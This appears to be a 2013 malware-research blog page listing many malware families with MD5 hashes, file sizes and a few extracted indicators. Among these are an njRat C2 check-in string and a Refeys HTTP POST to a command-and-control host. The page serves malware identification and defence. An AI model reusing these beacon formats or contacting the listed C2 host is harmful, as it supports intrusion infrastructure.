About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Thursday, August 22, 2013

njRat / Backdoor.LV strings - APT



C2 checkin
lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXB hZA==|'|'|[endof]act|'|'| Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA==

File: njRAt_1D3BAEDD747F6F9BF92C81EB9F63B34B
MD5:  1d3baedd747f6f9bf92c81eb9f63b34b
Size: 110080





Wednesday, August 21, 2013

Refeys.A strings - CRIME

Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880

Monday, August 19, 2013

Nitedrem strings - CRIME

MD5:  508af8c499102ad2ebc1a83fdbcefecb
Size: 147456





Saturday, August 17, 2013

Sality strings - CRIME

File: sality
MD5:  ceaf4d9e1f408299144e75d7f29c1810
Size: 997537




Friday, August 16, 2013

Chebri.C strings - CRIME

File: Chebri_B605C8E99315C330A015F36DE2A870EE
MD5:  b605c8e99315c330a015f36de2a870ee
Size: 8704




Torpig miniloader strings - CRIME

File: Torpig miniloader_0F82964CF39056402EE2DE9193635B34
MD5:  0f82964cf39056402ee2de9193635b34
Size: 242688




Monday, August 12, 2013

Coswid strings - APT

File: D62CD4AD2A919B6ACFA6D49D446DFFDB_svchost.exe_
MD5:  d62cd4ad2a919b6acfa6d49d446dffdb
Size: 19968

see md5 other below


COOKIES Cookiebag Dalbot strings - APT (2)

File: COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
MD5:  543e03cc5872e9ed870b2d64363f518b
Size: 126976




COOKIES Cookiebag Dalbot strings - APT (1)

File: COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
MD5:  0c28ad34f90950bc784339ec9f50d288
Size: 151552




Citadel 1.3.5.1 strings - CRIME (2)

File: Citadel1.3.5.1_296DA66E2F5239F9AF433C1EFBCDC079
MD5:  296da66e2f5239f9af433c1efbcdc079
Size: 276992




Citadel 1.3.5.1 strings - CRIME (1)

File: Citadel1.3.5.1_439333E63DD1DCA5C23653BDBD740CFC
MD5:  439333e63dd1dca5c23653bdbd740cfc
Size: 245568




Beebus Warp strings - APT

File: Beebus_WARP_D7EC457BE3FAD8057580E07CAE74BECB
MD5:  d7ec457be3fad8057580e07cae74becb
Size: 80896




WEBC2-RAVE strings - APT

File: WEBC2-RAVE_sample_BF0EE4367EA32F8E3B911C304258E439
MD5:  bf0ee4367ea32f8e3b911c304258e439
Size: 13824

scroll for #2  WEBC2-RAVE_sample_438983192903F3FECF77500A39459EE6


Taleret strings - APT (2)

File: Taleret_5328CFCB46EF18ECF7BA0D21A7ADC02C
MD5:  5328cfcb46ef18ecf7ba0d21a7adc02c
Size: 126976




Taleret strings - APT (1)

File: Taleret_FED166A667AB9CBB1EF6331B8E9D7894
MD5:  fed166a667ab9cbb1ef6331b8e9d7894
Size: 36864

Ascii Strings:


Sunday, August 11, 2013

Alina POS v.5.6 strings - CRIME

File: Alinav5.6-POS_5A22ED78B6454E34217D07C4AF37B23B
MD5:  5a22ed78b6454e34217d07c4af37b23b
Size: 167936




Saturday, August 10, 2013

Alina POS v.5.3 strings -CRIME

robohash
File: Alina-POS_
4C754150639AA3A86CA4D6B6342820BE
MD5:  4c754150639aa3a86ca4d6b6342820be
Size: 48128

Ascii Strings:


BunituB-Proxy strings - CRIME (3)

robohash

File: BunituB-Proxy_BC22DE23FB07EE9E3C02DD1D2B3E52B3
MD5:  bc22de23fb07ee9e3c02dd1d2b3e52b3
Size: 73728




BunituB-Proxy strings - CRIME (2)

robohash
File: BunituB-Proxy_B64D221166E494AC00251594304BE072
MD5:  b64d221166e494ac00251594304be072
Size: 15872




BunituB-Proxy strings - CRIME

File: BunituB-Proxy_A725B21C1F9D24ADA97564F3F152CF50
MD5:  a725b21c1f9d24ada97564f3f152cf50
Size: 16896



Blazebot strings - CRIME

File: Blazebot_DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E.exe_
MD5:  dbaf6f1d0eaab5dc0c88b9ceec9ea95e
Size: 251957



Bladabindi strings - CRIME

File: fe3e87a746bbf71268a35dfc43a6396d1ef3a92e33b99e1350317183edb66da6
MD5:  82f0aeb7ce7c448b763055a10726ed7b
Size: 28672



Bitcoinminer strings - CRIME

File: Bitcoinminer_F865C199024105A2FFDF5FA98F391D74_syu.exe_
MD5:  f865c199024105a2ffdf5fa98f391d74
Size: 589798



Beebone Downloader strings - CRIME (2)

File: Beebone_Downloader_7F5EACBF1CACF19502260AF34ADEB8EF
MD5:  7f5eacbf1cacf19502260af34adeb8ef
Size: 32768



Beebone Downloader strings - CRIME

File: Beebone_Downloader_8C1AF0A0D20FF98D33C31C24D8967E4F
MD5:  8c1af0a0d20ff98d33c31c24d8967e4f
Size: 32768



Avatar Rootkit NETbotnet strings - CRIME

File: Avatar_Rootkit_NETbotnet_32d6644c5ea66e390070d3dc3401e54b_unpacked
MD5:  32d6644c5ea66e390070d3dc3401e54b
Size: 129024



Ardamax Keylogger strings - CRIME

File: ArdamaxKeylogger_E33AF9E602CBB7AC3634C2608150DD18
MD5:  e33af9e602cbb7ac3634c2608150dd18
Size: 802724



ArcomRat strings - CRIME

File: Arcomrat_4015DD5B27EB612CA5DC320033E284C5
MD5:  4015dd5b27eb612ca5dc320033e284c5
Size: 1024960



Andromeda Bot strings - CRIME

File: Andromeda_85F908A5BD0ADA2D72D138E038AECC7D_DHL-LABEL-ID-2456-8344-5362-5466.exe_
MD5:  85f908a5bd0ada2d72d138e038aecc7d
Size: 57344



Pandora DDoS bot strings - CRIME

This summary is not available. Please click here to view the post.